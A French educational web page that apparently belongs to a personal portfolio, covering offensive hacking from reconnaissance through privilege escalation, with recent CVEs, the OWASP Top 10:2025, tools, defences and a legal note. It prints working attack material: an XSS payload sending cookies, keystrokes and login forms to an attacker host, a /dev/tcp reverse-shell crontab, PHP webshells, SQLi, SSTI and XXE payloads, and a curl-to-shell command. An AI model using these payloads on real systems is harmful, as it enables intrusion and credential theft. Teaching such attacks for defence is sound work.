← Retour aux projets
Projet — Sécurité informatique

Bases du
Hacking
offensif

Reconnaissance, exploitation réseau, attaques web, injections SQL, escalade de privilèges, post-exploitation. Ce dossier documente les fondements techniques du hacking offensif — ancré dans les exploits réels de 2024-2025 et le standard OWASP Top 10:2025. À des fins éducatives et de compréhension de la sécurité défensive.

Offensif CVE 2024–2025 OWASP Top 10 : 2025 Éducatif Network · Web · System
Chiffres — 2025
21k+
CVEs catalogués H1 2025
+17%
Hausse vs H1 2024
24%
CVE KEV = RCE
5j
Délai moyen exploit post-CVE
Méthodologie offensive

La chaîne d'attaque

Toute attaque suit une progression logique — le kill chain. Comprendre chaque phase permet autant d'attaquer que de défendre. La reconnaissance est la phase la plus longue et la plus critique : un attaquant patient gagne.

🔭
Recon
OSINT, DNS, ports, sous-domaines, empreinte ASN
🗺
Scan
Nmap, Nuclei, détection de versions, fingerprinting
⚔️
Exploitation
SQLi, XSS, RCE, overflow, CVE publics
🏠
Post-exploit
Shell, pivot, dump creds, lateral movement
👑
PrivEsc
SUID, sudo -l, kernel exploits, misconfigs
👻
Persistance
Crontab, systemd, webshell, C2

Reconnaissance — passive & active

La reconnaissance est l'art de collecter de l'information sans déclencher d'alarme. Passive = zero contact avec la cible. Active = interaction directe, détectable.

Passive
OSINT & Footprinting
DNS : dig any target.com, dnsx, transferts de zone (dig axfr sur nameservers mal configurés).

Sous-domaines : subfinder -d target.com, amass enum, Certificate Transparency (crt.sh), Google Dork site:*.target.com.

ASN / IP ranges : whois, BGP.he.net, Shodan org:"TargetCorp", Censys.

Emails & personnes : theHarvester, Hunter.io, LinkedIn Dorking. Les emails récoltés → credential stuffing contre Azure AD / O365.

GitHub leaks : trufflehog github --repo=…, GitLeaks. Secrets hardcodés dans les repos publics = vecteur d'entrée #1 en 2024-2025.
Active
Scan & Fingerprinting
Nmap : nmap -sS -sV -O -p- --min-rate 5000 target — SYN stealth + détection de version + OS. -sC pour les scripts NSE (vuln detection, brute force).

Nuclei : scanner de templates CVE. nuclei -u https://target.com -t cves/ -severity critical,high — détecte automatiquement des dizaines de CVE critiques.

Wappalyzer / WhatWeb : stack tech (CMS, frameworks, versions).

ffuf / feroxbuster : fuzzing de répertoires et paramètres. ffuf -u https://target/FUZZ -w wordlist.txt -mc 200,301,302

Shodan Dorks : hostname:target.com port:8080 http.title:"Admin" — trouve les panneaux d'admin exposés, caméras, SCADA.
Recon automatisé — pipeline bashbash
# Pipeline de recon complet sur un domaine
TARGET="target.com"

# 1. Sous-domaines
subfinder -d $TARGET -silent | dnsx -silent > subdomains.txt
amass enum -passive -d $TARGET >> subdomains.txt

# 2. IPs actives
cat subdomains.txt | dnsx -a -resp-only > ips.txt

# 3. Ports ouverts (rapide)
nmap -sS --open -p- --min-rate 10000 -iL ips.txt -oG ports.txt

# 4. Détection CVE avec Nuclei
cat subdomains.txt | httpx -silent | \
  nuclei -t cves/ -severity critical,high -silent -o vulns.txt

# 5. Secrets dans les URLs
gau $TARGET | grep -E "token=|api_key=|secret=|password="
Attaques réseau

Exploitation réseau

Les attaques réseau ciblent les protocoles et les équipements. La majorité des CVE critiques exploités en 2024-2025 sont des vulnérabilités réseau dans des VPN, firewalls et équipements d'accès.

Simulation — Scan réseau & cartographie

Représentation d'un scan réseau : découverte d'hôtes → énumération des services → identification des vecteurs d'attaque potentiels. Les nœuds rouges indiquent des services vulnérables.

MITM
ARP Spoofing & Sniffing
Principe : empoisonner le cache ARP des victimes pour intercepter leur trafic.
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

Ettercap / Bettercap : automatise le MITM + sniffing des credentials HTTP/FTP/Telnet non chiffrés. bettercap -iface eth0net.sniff on.

SSL Stripping (Hstshijack) : forcer la victime en HTTP avant qu'elle atteigne HTTPS. Bloqué par HSTS — mais de nombreux sous-domaines ne l'implémentent pas.

Défense : HTTPS partout + HSTS preloading, DAI (Dynamic ARP Inspection) sur les switches managés, port security.
Exploit
CVE-2025-0282 — Ivanti Connect Secure (0-day)
Type : Stack-based buffer overflow → RCE pré-authentification.
CVSS : 9.0 · Exploité avant le patch (Janvier 2025).

Ivanti Connect Secure VPN — équipement d'accès distant massif. La vulnérabilité permettait à un attaquant non authentifié d'exécuter du code sur le serveur VPN. Exploitée par des APT étatiques (Chine).

Chaîne post-exploitation observée : reconnaissance HTTP répétée → désactivation SELinux + syslog → déploiement de webshell PHASEJAM → mouvement latéral.

Nominet (registre .UK) compromis via cette vulnérabilité, semaine du 30 décembre 2024.
Protocoles
DNS Poisoning & Hijacking
Cache poisoning (Kaminsky 2.0) : injection de fausses réponses DNS via race condition sur les transaction IDs.

DNS hijacking actif : BGP hijacking + faux serveur DNS → redirection de trafic légitime. Utilisé par des acteurs étatiques (ex. DNSpionage campaign).

DNS over HTTPS (DoH) — vecteur attaquant : en 2024-2025, plusieurs C2 malware utilisent DoH pour masquer les requêtes C2 dans du trafic HTTPS légitime (port 443) — contourne les pare-feux inspectant le DNS classique (port 53).

curl https://cloudflare-dns.com/dns-query?name=c2.attacker.com&type=A
Tunneling
Port Forwarding & Pivoting
Une fois un premier accès établi, le pivot permet d'atteindre des réseaux internes non exposés.

SSH Local Port Forward :
ssh -L 8080:interne:80 user@bastion
→ expose le port 80 interne sur localhost:8080.

Chisel : tunnel HTTP/WebSocket. chisel server -p 9999 --reverse + chisel client attacker:9999 R:socks → proxy SOCKS5 vers le réseau interne.

Ligolo-ng : outil moderne favori des pentesters — crée une interface réseau locale qui route vers le réseau cible via un agent léger.
nmap — scan avancé & détection de services
malicaeus@kali:~$ nmap -sS -sV -sC -O -p- --min-rate 5000 -oA full_scan 10.10.11.50
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.50
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu
80/tcp open http Apache httpd 2.4.52
|_ http-title: Admin Panel - Login
443/tcp open https Apache httpd 2.4.52 (TLS 1.2)
3306/tcp open mysql MySQL 8.0.32-0ubuntu0.22.04.2
OS details: Linux 5.15 - 6.1
malicaeus@kali:~$ nuclei -u http://10.10.11.50 -t cves/ -severity critical,high
[INF] Templates loaded: 4823
[critical] [CVE-2021-41773] Apache Path Traversal → http://10.10.11.50/cgi-bin/.%2e/.%2e/etc/passwd
[high] [CVE-2022-0492] MySQL auth bypass possible → port 3306 open to 0.0.0.0
Web Hacking

Exploitation web

Les applications web représentent la surface d'attaque dominante en 2025. RCE via désérialisation, XSS DOM-based, SSRF, IDOR, broken auth — chaque vulnérabilité suit un pattern exploitable reproducible.

XSS
Cross-Site Scripting — 3 familles
Reflected XSS : payload dans l'URL, exécuté immédiatement dans la réponse. Vecteur : phishing + lien forgé.
?q=<script>document.location='https://attacker/steal?c='+document.cookie</script>

Stored XSS : payload persistant en base. Un commentaire, un nom d'utilisateur. Exécuté à chaque visite. Impact : keylogger, vol de session admin.

DOM-based XSS (2024-2025 dominant) : la faille est dans le JavaScript côté client. document.write(location.hash) ou innerHTML = URLSearchParams.get('x'). Invisible aux WAF inspectant le HTML serveur.

XSS → RCE en 2025 : CVE-2025-66222/66481 (DeepChat) — XSS dans contenu Mermaid → RCE via Electron IPC bridge. Le DOM-XSS devient RCE dans les Electron apps.
SSRF
Server-Side Request Forgery
SSRF force le serveur à émettre des requêtes vers des ressources internes (métadata cloud, services internes, localhost).

AWS metadata : http://169.254.169.254/latest/meta-data/iam/security-credentials/ → récupération de clés IAM → compromission du compte AWS complet.

SSRF vers RCE : si le service interne ciblé est lui-même vulnérable (ex. Elasticsearch non authé sur localhost:9200) → escalade.

SSRF aveugle : pas de réponse visible → Burp Collaborator / interactsh pour détecter les requêtes sortantes.

OWASP 2025 : SSRF fusionné dans A01 (Broken Access Control) — reflète que la confusion entre accès service et accès user est fondamentale dans les microservices.
IDOR
Insecure Direct Object Reference
Changer un identifiant dans une requête pour accéder aux ressources d'un autre utilisateur, sans vérification d'autorisation côté serveur.

Horizontal : GET /api/users/1337/invoicesGET /api/users/1338/invoices
Vertical : role=userrole=admin dans un JWT ou paramètre POST.

Mass assignment : PUT /user/profile {"username":"alice","role":"admin"} — si le framework accepte tous les champs sans filtre (Rails strong_parameters manquant, Django serializer without read_only_fields).

UUID ≠ sécurité : les UUIDs ne remplacent pas les contrôles d'autorisation. UUID v1 est prévisible basé sur l'horodatage et l'adresse MAC.
RCE
CVE-2025-53770 — SharePoint ToolShell
Type : désérialisation non sécurisée → RCE non authentifié + persistance.
CVSS : 9.8 · Actif en production juillet 2025.

Vulnérabilité dans SharePoint Server on-premises. La chaîne ne s'arrête pas au RCE : l'attaquant pouvait établir une persistance durable (web shells, modification de DLLs). Shadowserver a identifié 424 serveurs encore vulnérables au 23 juillet 2025 après que le PoC était public depuis 4 jours.

Pattern récurrent : désérialisation Java/C#/.NET sans validation → RCE. Voir aussi CVE-2025-55182 (React Server Components 19.0.0-19.2.0, pré-auth RCE) exploité par des acteurs liés à la Chine.
XSS payload avancé — cookie stealing + redirectionjavascript
// Payload XSS complet — exfiltration de session + keylogger
// À injecter dans un champ vulnérable (commentaire, nom, paramètre GET)

const ATTACKER = 'https://webhook.attacker.com';

// 1. Vol de cookies (si pas HttpOnly)
new Image().src = `${ATTACKER}/c?v=${btoa(document.cookie)}`;

// 2. Capture des frappes (keylogger)
let buf = '';
document.addEventListener('keypress', e => {
  buf += e.key;
  if (buf.length > 20) {
    fetch(`${ATTACKER}/k`, { method: 'POST', body: buf }); buf = '';
  }
});

// 3. Capture de formulaire de login (credential harvesting)
document.querySelector('form')?.addEventListener('submit', e => {
  const data = new FormData(e.target);
  fetch(`${ATTACKER}/creds`, {
    method: 'POST',
    body: JSON.stringify(Object.fromEntries(data))
  });
});
Injection

SQL Injection — anatomie complète

SQLi reste l'une des vulnérabilités les plus exploitées malgré ses 25 ans d'existence. En 2025, des CVE critiques comme CVE-2025-64459 (Django, CVSS 9.1) et CVE-2025-25257 (Fortinet FortiWeb, pré-auth SQLi → RCE) prouvent que le problème est loin d'être résolu.

Anatomie d'une injection SQL — visualisation

Flux d'une requête légitime (gauche) vs requête injectée (droite). L'entrée utilisateur non sanitisée modifie la logique SQL et accède à des données non autorisées.

Classique
In-band SQLi
Résultat visible dans la réponse HTTP.

Error-based : provoquer une erreur SQL qui révèle le schéma.
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()))-- -

UNION-based : concaténer les résultats d'une autre requête.
' UNION SELECT 1,username,password,4 FROM users-- -

Prérequis : connaître le nombre de colonnes (ORDER BY 1,2,3…) et les types compatibles.
Blind
Blind & Time-based
Pas de sortie visible — on infère les données bit à bit.

Boolean-based :
' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'-- -
→ observer si la page change.

Time-based :
' AND IF(1=1, SLEEP(5), 0)-- -
→ mesurer le délai de réponse.

SQLMap automatise : sqlmap -u "http://site/?id=1" --dbs --batch --level 5
Out-of-band
OOB & SQLi → RCE
Exfiltration via DNS/HTTP depuis le serveur DB.
LOAD_FILE('/etc/passwd') ou requête DNS si secure_file_priv vide.

SQLi → RCE (MySQL) :
SELECT '<?php system($_GET["c"]);?>' INTO OUTFILE '/var/www/shell.php'
→ webshell déposé si MySQL a les droits d'écriture dans le webroot.

CVE-2025-25257 (Fortinet FortiWeb) : pré-auth SQLi via get_fabric_user_by_tokenINTO OUTFILE → RCE comme root. Watchtowr Labs, août 2025.
CVE-2025-64459 — Django QuerySet injection (CVSS 9.1)python
# VULNÉRABLE — pattern courant dans les APIs Django
# L'attaquant contrôle les clés du dict passé à filter(**)
def search_users(request):
    filters = request.GET.dict()          # ← données attaquant
    users = User.objects.filter(**filters) # ← injection ici
    return JsonResponse({'users': list(users.values())})

# EXPLOIT — bypass d'authentification sans mot de passe
# GET /api/users?_connector=OR&is_superuser=True
# → SELECT * FROM users WHERE (original) OR is_superuser=True
# → retourne tous les comptes admin

# EXPLOIT 2 — accès à des documents confidentiels
# GET /api/docs?_connector=OR&confidential=True
# → contourne le filtre owner=request.user

# ─────────────────────────────────────────────
# CORRECTION — whitelist explicite des champs autorisés
ALLOWED_FILTERS = {'username', 'email', 'is_active'}

def search_users_safe(request):
    raw = request.GET.dict()
    # Ne conserver que les clés autorisées
    filters = {k: v for k, v in raw.items() if k in ALLOWED_FILTERS}
    users = User.objects.filter(**filters)
    return JsonResponse({'users': list(users.values())})
Autres injections critiques — 2025 : les injections ne se limitent pas au SQL.
· Command injection : ; id, | cat /etc/passwd dans tout paramètre passé à popen(), exec(), system(). CVE-2023-1389 (TP-Link, 8465 exploits/mois en juillet 2025) — encore massivement actif.
· SSTI (Server-Side Template Injection) : {{7*7}} dans Jinja2, Twig, Freemarker → RCE. {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
· XXE (XML External Entity) : <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> → lecture de fichiers locaux ou SSRF.
· LDAP Injection : modification des filtres LDAP d'authentification → bypass sans password.
Escalade de privilèges

PrivEsc — de user à root

Un shell bas-privilèges n'est qu'une porte entrouverte. L'escalade de privilèges (Linux et Windows) exploite des misconfigurations, des binaires SUID, des sudo rules laxistes ou des vulnérabilités kernel.

Linux
PrivEsc Linux — checklist
sudo -l : liste les commandes sudoables sans mot de passe. Si vim, find, python, less → GTFOBins → root immédiat.
sudo vim -c ':!/bin/bash'

SUID/SGID : find / -perm -4000 -type f 2>/dev/null — binaires à bit SUID exécutés en tant que propriétaire (souvent root). GTFOBins liste les exploits.

Crontab root mal configuré : cat /etc/crontab + ls -la /script_appelé_par_root.sh. Si le script est writable → injection de code exécuté root.

PATH hijacking : si root lance un script sans chemin absolu → créer un faux binaire dans un dossier du PATH.
Windows
PrivEsc Windows — vecteurs
Unquoted Service Path : C:\Program Files\Vulnerable App\service.exe → placer C:\Program.exe → exécuté par le service au redémarrage.

Weak Service Permissions : sc config VulnSvc binPath= "C:\Windows\Temp\rev.exe" si l'utilisateur a les droits de modification du service.

AlwaysInstallElevated : si activé dans les registres HKCU et HKLM → tout MSI s'installe avec les droits SYSTEM.
msfvenom -p windows/shell_reverse_tcp … -f msi > privesc.msi

CVE-2024-49039 (Firefox + Windows Task Scheduler) : chaîne RomCom — RCE Firefox + elevation via Task Scheduler → déploiement de backdoor. Actif novembre 2024.
Kernel
Kernel Exploits Linux
CVE-2024-1086 (nf_tables use-after-free) : LPE universelle sur la plupart des noyaux Linux entre v5.14 et v6.6 (Debian, Ubuntu, KernelCTF). PoC public. Permet d'obtenir root depuis n'importe quel shell non-privilégié.

CVE-2021-4034 (PwnKit / pkexec) : encore présent sur des systèmes non patchés — LPE triviale, une ligne.

Dirty Pipe (CVE-2022-0847) : écriture arbitraire dans tout fichier lisible → patch /etc/passwd → root.

linPEAS : curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh — énumération complète automatique des vecteurs PrivEsc.
Post-exploit
Persistence & Lateral Movement
Reverse shell persistant : crontab * * * * * bash -i >& /dev/tcp/attacker/4444 0>&1

SSH backdoor : ajouter une clé publique dans ~/.ssh/authorized_keys de root.

Webshell discret : <?php @eval($_POST['x']);?> dans un fichier image renommé .php ou dans un template CMS.

Pass-the-Hash (Windows) : crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH — réutilisation du hash NTLM sans connaître le mot de passe clair.

BloodHound : cartographie les chemins d'escalade dans Active Directory — find shortest path to Domain Admin.
Checklist PrivEsc Linux — script d'énumérationbash
#!/bin/bash — Énumération rapide PrivEsc

echo "=== Kernel ==="
uname -a; cat /etc/os-release

echo "=== Sudo rights ==="
sudo -l 2>/dev/null

echo "=== SUID binaries ==="
find / -perm -4000 -type f 2>/dev/null | grep -v proc

echo "=== Writable cron scripts ==="
cat /etc/crontab /etc/cron* 2>/dev/null | grep -v "^#"

echo "=== World-writable files ==="
find /etc /var /usr -writable -type f 2>/dev/null | head -20

echo "=== Passwords in files ==="
grep -r "password\|passwd\|secret\|api_key" /var/www /opt 2>/dev/null | \
  grep -v "Binary" | head -15

echo "=== Network connections ==="
ss -tulnp | grep -v "127.0.0.1"
CVE critiques 2024–2025

Exploits récents — ce qui a été utilisé en conditions réelles

Sélection des CVE les plus significatifs de 2024-2025 — activement exploités in-the-wild, publiés avec PoC, ou utilisés dans des attaques de groupes APT documentés.

CVEProduitTypeCVSSStatut 2025Impact réel
CVE-2025-0282 Ivanti Connect Secure VPN Stack BOF → RCE 9.0 0-day exploité Nominet (.UK) compromis. APT chinois. PHASEJAM webshell. Pré-auth.
CVE-2025-53770 Microsoft SharePoint Server Désérialisation → RCE 9.8 Exploité activement 424 serveurs vulnérables 4 jours après PoC public. Persistance durable.
CVE-2025-55182 React Server Components 19.x Désérialisation → RCE 9.8 KEV CISA Exploité par acteurs China-nexus. Pré-auth RCE via HTTP. AWS blog.
CVE-2025-25257 Fortinet FortiWeb SQLi pré-auth → RCE 9.8 PoC public SQLi → INTO OUTFILE → webshell root. Watchtowr Labs, août 2025.
CVE-2025-64459 Django 4.2 / 5.1 / 5.2 SQLi QuerySet 9.1 Patch disponible Bypass auth admin via _connector=OR&is_superuser=True. Endor Labs.
CVE-2024-1086 Linux Kernel 5.14–6.6 UAF → LPE 7.8 PoC universel public Privilege escalation locale sur Debian, Ubuntu, KernelCTF. Trivial à exploiter.
CVE-2024-49039 Windows Task Scheduler LPE 7.8 Exploité — RomCom APT Chainé avec CVE-2024-9680 (Firefox RCE). Backdoor déployé globalement.
CVE-2025-32432 Craft CMS RCE pré-auth 10.0 KEV CISA CMS très répandu. Exploitation massive documentée. CVSS max.
CVE-2025-22457 Ivanti Connect Secure 22.7 Stack BOF → RCE 9.0 APT China-nexus Mandiant : exploitation confirmée par APT. Ingress de réseaux gouvernementaux.
CVE-2025-66222/66481 DeepChat (Electron) XSS → RCE via IPC 9.3 Patch insuffisant d'abord XSS dans Mermaid → Electron IPC bridge → RCE système complet. 2025.
Tendance 2025 : 21 500+ CVEs catalogués en H1 2025 — hausse de 16-18% vs H1 2024. Les vulnérabilités RCE représentent 24% des entrées du catalogue CISA KEV. Le délai moyen entre publication d'un CVE critique et premier exploit in-the-wild est tombé à 5 jours. Les équipements d'accès distant (VPN, firewalls, load balancers) sont systématiquement ciblés en premier — ils sont exposés sur Internet et donnent accès à tout le réseau interne.
OWASP Top 10 : 2025

OWASP Top 10 — 2025

La version 2025 marque un virage vers les causes racines plutôt que les symptômes. Deux nouvelles catégories, une fusion SSRF → Broken Access Control, et la montée en puissance des Supply Chain Failures.

A1
Broken Access Control + SSRF fusionné
Contournement des vérifications d'accès via modification d'URL, manipulation de JWT, IDOR, élévation de privilèges, CORS mal configuré. SSRF nouvellement intégré ici.
A2
Security Misconfiguration ↑ #2
Passé de #5 à #2 — comptes par défaut exposés, services inutiles actifs, headers de sécurité manquants, XXE, permissions excessives.
A3
Software Supply Chain Failures Nouveau
Évolution de "Vulnerable Components" — couvre maintenant les compromissions de build, CI/CD, tooling, dépendances transitives. Taux d'incidence : 5,19%.
A4
Cryptographic Failures ↓ #4
MD5/SHA-1 pour les mots de passe, TLS 1.0 encore actif, secrets hardcodés dans les repos publics, mauvaise gestion des clés.
A5
Injection
SQL, Command, LDAP, SSTI, XXE, XSS. Malgré 25 ans d'existence, les injections dominent les CVE critiques actuels (voir CVE-2025-64459, CVE-2025-25257).
A6
Insecure Design
Questions secrètes pour reset mot de passe, logique métier bypassable, rate-limiting absent, flux d'authentification bypassables par design.
A7
Identification & Auth Failures
Credential stuffing, absence de MFA, session IDs prévisibles, tokens JWT non invalidés, flux de récupération de mot de passe non sécurisés.
A8
Data Integrity Failures
Mises à jour auto sans vérification d'intégrité, désérialisation non sécurisée, pipeline CI/CD compromettable, plugins non vérifiés.
A9
Security Logging Failures
Absence de logs sur les événements critiques, délai de détection moyen ~200 jours post-breach, logs insuffisants pour la forensics post-incident.
A10
Mishandling of Exceptional Conditions Nouveau
Stack traces exposant des schémas DB en prod, comportements d'erreur qui escaladent les privilèges, paniques crash exploitables.
Outils & Défense

Arsenal offensif & contre-mesures

🔧
Outils offensifs
Recon : Nmap, Subfinder, Amass, Nuclei, Shodan, theHarvester, gau.
Web : Burp Suite Pro, OWASP ZAP, ffuf, SQLMap, Nikto, WPScan.
Exploitation : Metasploit Framework, ExploitDB, searchsploit.
Post-exploit : linPEAS / winPEAS, BloodHound, Mimikatz, CrackMapExec, Impacket, Ligolo-ng, Chisel.
Forensics : Volatility (mémoire), Autopsy, Wireshark, NetworkMiner.
🛡
Défense — principes
Least privilege : chaque compte/service avec le minimum nécessaire. sudo avec whitelist explicite.
Defense in depth : WAF + IPS + EDR + SIEM + PAM. Chaque couche ralentit l'attaquant.
Patch management : délai ≤7 jours pour les CVE CVSS ≥9. Scanner quotidien (Nuclei, Tenable).
Zero Trust : vérifier l'identité à chaque requête. Micro-segmentation réseau.
Secrets management : Vault, AWS Secrets Manager. Git hooks bloquant les commits avec secrets.
🎯
Environnements de pratique
HackTheBox : machines réalistes (easy → insane). Labs Active Directory.
TryHackMe : parcours guidés pour débutants. Chemins CTF structurés.
CTF (Capture The Flag) : picoCTF, PCTF, DEF CON CTF. Catégories : web, crypto, forensics, pwn, reverse.
DVWA / WebGoat / VulnHub : apps volontairement vulnérables à déployer localement.
PentesterLab : exercices web spécialisés avec corrigés détaillés.
Note éthique et légale : toutes les techniques documentées ici sont présentées à des fins éducatives — pour comprendre comment les attaques fonctionnent afin de mieux les défendre. Les utiliser sans autorisation explicite sur des systèmes tiers est illégal dans la plupart des juridictions (loi Godfrain en France, CFAA aux États-Unis, Computer Misuse Act au Royaume-Uni). Un Bug Bounty program ou un scope de pentest écrit sont les seuls cadres légaux pour tester des systèmes réels. Learn to hack legally — hack to learn.